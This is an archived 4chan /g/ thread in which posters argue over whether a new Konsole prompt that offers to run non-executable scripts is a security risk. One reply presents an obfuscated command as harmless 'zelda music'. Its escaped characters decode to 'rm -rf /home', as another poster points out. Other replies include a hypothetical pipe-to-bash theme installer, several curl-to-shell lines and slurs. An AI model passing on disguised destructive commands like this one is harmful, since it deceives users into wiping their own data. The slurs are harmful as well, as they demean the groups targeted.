[a / b / c / d / e / f / g / gif / h / hr / k / m / o / p / r / s / t / u / v / vg / vm / vmg / vr / vrpg / vst / w / wg] [i / ic] [r9k / s4s / vip] [cm / hm / lgbt / y] [3 / aco / adv / an / bant / biz / cgl / ck / co / diy / fa / fit / gd / hc / his / int / jp / lit / mlp / mu / n / news / out / po / pol / pw / qst / sci / soc / sp / tg / toy / trv / tv / vp / vt / wsg / wsr / x / xs] [Settings] [Search] [Mobile] [Home]
Board
Settings Mobile Home
/g/ - Technology


Thread archived.
You cannot reply anymore.


[Advertise on 4chan]


File: kde_hates_security.png (288 KB, 1369x448)
288 KB PNG
why KDE hates security?
>>
im not entirely sure that kde has to do something with your script not running, Nate Higgers..
>>
I've tried Gnome out yesterday after many years of avoiding it. It is pretty intuitive at multitasking, I must say. I am coming to the conclusion that Gnome is better for tech-illiterate newfaggot Linux users since it don't overwhelm it's users with too many options. Not bad.
>>
>>108738454
it's just
chmod +x fancy-script.py
>>
>>108738454
Why DO you hate grammar?
>>
>>108738528
we know smartass, but the risk of executing every script that comes to the prompt is stupid.
>>
>>108738513
>right wing equivalent of rainblow flag
>>
>>108738454
>shell does thing
>"why does my DE do this?"
>>
File: kde_hates_security2.png (247 KB, 1158x455)
247 KB PNG
>>108738572
is not the shell retard, is a new feature of Konsole.
>>
>>108738557
i only execute scripts i write meself

like

touch my body
>>
>>108738593
Send ur script here and let me try it on my Konsole rn. I don't believe that's right.
>>
>>108738605
create a new file called zelda_music.sh
paste
aplay --rawaudio "\$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
>>
File: 1767519812467477.png (30 KB, 525x222)
30 KB PNG
>>108738593
>>
>>108738593
is not shell saar is a new feeture saar
>>
>>108738454
I don't get it. What's the problem?
If your user has permissions to do chmod +x as >>108738528 said, what's wrong with the console asking you if you want it to be done automatically?
Where's the security issue?
>>
>>108738698
>Where's the security issue?
if you need to ask then you deserve to be hack.
>>
>>108738557
>y/N
>purposefully selects y because hitting enter would default to No
>does what you asked it to do
>the horror
>>
>>108738728
>y/N
>try to type "thank you but no"
>accidentally type y instead of t in thank
>slip and fall over the enter key
>pc explodes
>>
File: 1772050119126999.png (19 KB, 400x400)
19 KB PNG
>nothingburger
>all these typos
>still manage to call others stupid
this thread stinks
>>
Why (do) ESLs skip words when asking these questions?
I've noticed this trend on the rise
>Why (do/is/has) X Y?
>>
>>108738745
the answer to your question is that different languages have different gramatical structures
you're seeing it more because over 90% of /g/ is comprised of third worlders now
>>
>Are you sure you want me to fuck your mom?
>Yes
>Okay
>NO, NOT LIKE THAT, MOTHERFUCKER
>>
>>108738745
Tы знaeшь, этo oчeнь дaжe aктyaльный вoпpoc. Былo бы лyчшe ecли oни пpocтo зaдaвaли вoпpocы нa cвoeм poднoм языкe. Я oчeнь paд чтo вы пoдняли этy тeмy, aнoн. Ecть o чeм зaдyмaтьcя.
>>
>>108738454
Wtf it ran a script after you explicitly asked it to run a script. What a massive security hole. What's the CVE?
>>
This looks like something LTT would fuck up somehow
>yes, do as I say!
>>
>>108738738
I finally understand now... My PC really is insecure...
>>
>>108738557
It's just an if-check that runs chmod +x. It's literally no different from typing the command out, yourself. Check your /etc/profile.d for a file relating to konsole or a hook function your shell config.
>>
>>108738454
What the fuck - finally. This is an excellent feature.
>>
>>108738593
did you try marking it with chmod +x ./fancy-script.sh and then executing it with ./fancy-script.sh?

also can you post the output of
cat ./fancy-script.sh
?
>>
File: file.png (829 KB, 600x900)
829 KB PNG
>>108738698
>Where's the security issue?
>>108739140
>This is an excellent feature.
>>
>>108739172
I look like that and say that
>>
>>108739172
Thanks for posting your picture, I had a feeling you look like this.
>>
File: file.png (100 KB, 275x183)
100 KB PNG
>>108739176
>>108739183
>Thanks for posting your picture, I had a feeling you look like this.
>I look like that and say that
>>
>>108738624
Huh, I didn't know you could generate audio in the terminal like this. Pretty cool.
>>
>>108738557
so how do you propose this is fixed?
>>
>>108738454
>tell computer to do thing
>computer does thing
>:(
>>
>>108738544
Why do YOU hate deaccenting?
>>
>>108738572
Funnily enough, KDE is not the name of the DE.
The DE is called plasma
>>
>>108738454
What do you want? Fucking iOS where you're only allowed to execute stuff from the app store?
>>
i swear to god i stared at this for like two minutes looking for something wrong thinking i had gone mad because i couldn't guess that there could be somebody in this world so pathetically retarded as to think that a computer doing what you explicitly told it to do is some kind of critical security flaw
>>
>>108740305
>I swear to god i stared at this for like two minutes looking for something wrong
you people are stupid
>ktard love shiny themes
>he sees a theme in the web
>transparencies and all
>he want's it
>"just download this script to install it"
>ktards falls for it
>since the script is not an executable the linux security allows it
>but ktard is using Konsole with this new feature that will execute scripts w/o being executables
>"how convinient" the ktard says
>he even type the root password cause retarded KDE allow some themes to be installed only by root
>he falls for it and gets fucked by indian saars
>he blames Linux and the lack of security
>Linux gets the bad blood for one stupid feature of KDE
many such cases
>>
>>108738454
why OP hates learning english?
>>
Wintards meanwhile:
 irm https://get.activated.win | iex  
>>
>>108741797
KTards will surely fall for something like this:
> curl -s https://kampythemes.com/shinytheme.py | bash
>>
>>108738454
>try to execute a utf-8 plaintext
>u wot m8
>we can try to run this through the python interpreter, if you think it's safe
genuinely what is your fucking problem
LGTM
>>
>>108741797
okay?
curl -fsSL https://ollama.com/install.sh | sh
curl -fsSL https://opencode.ai/install | bash
curl -f https://zed.dev/install.sh | sh

don't throw stones from glass houses etc.
personally, i download the script first, get its hash, skim it, then get an llm to sanity check it
if i get paranoid, then i still have the script and corresponding hash
>>
>>108738624
this decodes to rm -rf /home

nice try slim.
>>
>>108741542
as if the situation would be any different if the file had the x bit set? also kys jeet
>>
>>108738454
>>108738593
>zsh
>>108738632
>bash



[Advertise on 4chan]

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.